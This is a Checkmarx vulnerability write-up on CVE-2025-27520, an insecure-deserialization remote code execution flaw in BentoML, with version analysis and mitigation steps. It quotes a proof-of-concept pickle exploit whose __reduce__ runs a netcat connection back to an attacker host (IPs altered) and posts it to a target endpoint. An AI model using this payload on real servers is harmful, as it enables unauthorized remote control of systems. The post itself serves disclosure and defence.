CVE-2025-27520 Critical RCE In BentoML Has Fewer Affected Versions Than Reported - Checkmarx

CVE-2025-27520 Critical RCE In BentoML Has Fewer Affected Versions Than Reported

8 min.

April 10, 2025

A critical Remote Code Execution (RCE) vulnerability, CVE-2025-27520 with a CVSSv3 base score of 9.8, has been recently discovered in BentoML, an AI service helper Python library found on PyPI. This flaw allows unauthenticated attackers to execute arbitrary code by sending malicious data payloads as requests and potentially take control of the server. While the advisory specifies versions from 1.3.4 through 1.4.2 as affected, Checkmarx Zero’s analysis indicates that this issue affects versions 1.3.8 through 1.4.2 (see below for details). It is recommended that affected adopters upgrade to version 1.4.3 or later to repair the issue.

You are potentially affected by this issue if you use BentoML (either directly or indirectly) to receive and process ML “payloads” (serialized data structures) from untrusted sources. Since this is a primary purpose of BentoML, the presence of a vulnerable version of this library should be considered a significant indicator of risk.

Issue Description

CVE-2025-27520 is a Remote Code Execution (RCE) vulnerability found in BentoML, a Python library designed for creating online serving systems that are optimized for AI applications and model inference. The full GHSA advisory describes the vulnerability and exploitation, which we summarize here. The flaw, that originates from an Insecure Deserialization, enables adversaries to execute arbitrary code on the server by sending a specially crafted HTTP request. This issue exists because the deserialize_value() function in the “serde.py” file deserializes input data without proper validation, meaning attackers can inject malicious payloads that trigger execution of arbitrary code when they are deserialized.

def deserialize_value(self, payload: Payload) -> t.Any: 
    if "buffer-lengths" not in payload.metadata: 
        return pickle.loads(b"".join(payload.data))

Code snippet from the BentoML library source; this is the flaw that leads to the vulnerability.

This flaw is essentially a reintroduction of CVE-2024-2912 , which had been previously fixed in version 1.2.5. Both CVEs deal with the same exact issue: an Insecure Deserialization vulnerability that can be exploited by sending an HTTP request to any valid endpoint and trigger RCE.

How To Exploit CVE-2025-2750

To exploit this vulnerability, the first step is to craft a malicious “pickle”, a binary data serialization system commonly used with Python. This “pickled” payload contains Python objects that can contain executable code that gets run when the payload is deserialized for use by the application. Vulnerable versions of BentoML do not deserialize such payloads in a safe manner, meaning an adversary can send Python code which performs malicious actions — including executing system commands — under the authority of the Python application running on the server.

In this case, an attacker can create a custom Python object (e.g. the Evil class) and override Python’s magic method __reduce__ with a tuple that tells Python to run the os.system function. The __reduce__ method is used to specify how the object should be deserialized or serialized and allows users to override default behavior with other meaningful actions. By calling os.system, an attacker can trigger system commands during the deserialized operation, such as initiating a reverse shell connection to this machine, as shown in the provided Proof of Concept.

This can then exploit the vulnerability by sending the maliciously crafted pickle payload to a vulnerable BentoML server via an HTTP request.

import pickle 
import os 
import requests 
 
headers = {'Content-Type': 'application/vnd.bentoml+pickle'} 
 
class Evil: 
   def __reduce__(self): 
       # start a netcat connetion back to attacker-controlled host
       # any valid Python can be used here, this is a simple example
       return(os.system, ('nc 256.98.36.121 1234',)) 
 
payload = pickle.dumps(Evil()) 
 
# send malicious request to target server running BentoML-based application
requests.post("http://256.98.36.123:3000/summarize",
              data=payload, headers=headers))

Code sample from the GHSA advisory for this issue (GHSA-33xw-247w-6hmc), modified to make IP addresses invalid for safety and with additional comments.

Exploitation of this vulnerability can allow adversaries to: 

  • Execute arbitrary code on the server, using privileges of a running Python application.
  • Control behavior of the affected system. 
  • Perform further attacks within the system’s connected network and services. 

How To Find, Mitigate and Repair CVE-2025-27520

The vulnerability exists in BentoML versions 1.3.8 through 1.4.2. If you are running a version within this range, you are affected. The advisory reports versions as early as 1.3.4 are vulnerable, but Checkmarx Zero analysts determined that the vulnerability actually re-emerged in version 1.3.8. By looking at commit 045001c3, we found that a previous security fix — originally introduced to address CVE-2024-2912 — had been removed. This missing code was specifically implemented to prevent this exact deserialization vulnerability now tracked as CVE-2025-27520.

In short, here’s the timeline of events:

  • The original vulnerability finding was reported as CVE-2024-2912.
  • It was patched in version 1.2.5
  • The fix was later removed in version 1.3.8
  • The same issue resurfaced and was reported again as CVE-2025-27520
  • It has now been re-patched in version 1.4.3

Checkmarx customers can use the SCA and container security products to identify whether their applications make use of a vulnerable version of BentoML, or other vulnerabilities. Otherwise, you can generate an SBOM using automated or manual processes and determine if an affected version of BentoML is installed as part of any of your Python application components’ dependency chain — it’s important to ensure that your SBOM process/tool can identify transitive (aka “indirect”) dependencies.

You can also examine running python environments, looking for patterns in virtual environments and site packages directories that match `bentoml-VERSION.dist-info`, where VERSION matches one of the affected versions. This method can result in some false negatives if BentoML is installed without using a package manager.

The simplest and most effective way to mitigate the issue is to upgrade BentoML to the patched version 1.4.3, where a fix commit — b35f4f4f — has been applied to prevent HTTP requests with Content-Type “application/vnd.bentoml+pickle”. This patch should be low risk for most users because it does not introduce any major code changes, and processing pickled content is not a common use case for BentoML adopters.

If upgrading is not possible, consider a custom mitigation such as a WAF configuration rule that blocks HTTP requests containing the “application/vnd.bentoml+pickle” Content-Type and serialized data in the request body. Such a rule is unlikely to fully eliminate the risk, and must be tested to ensure that it does not block legitimate application interactions.

Conclusion 

CVE-2025-27520 represents a significant risk to BentoML users, with potential for severe consequences if exploited. However, the reported range of affected versions in the advisory has been found to be incorrect by Checkmarx Zero; the vulnerability was reintroduced starting in version 1.3.8, not 1.3.4 as reported in the advisory. It is recommended that organizations upgrade to at least BentoML version 1.4.3 as soon as possible to mitigate the risk. 

Read More

Want to learn more? Here are some additional pieces for you to read.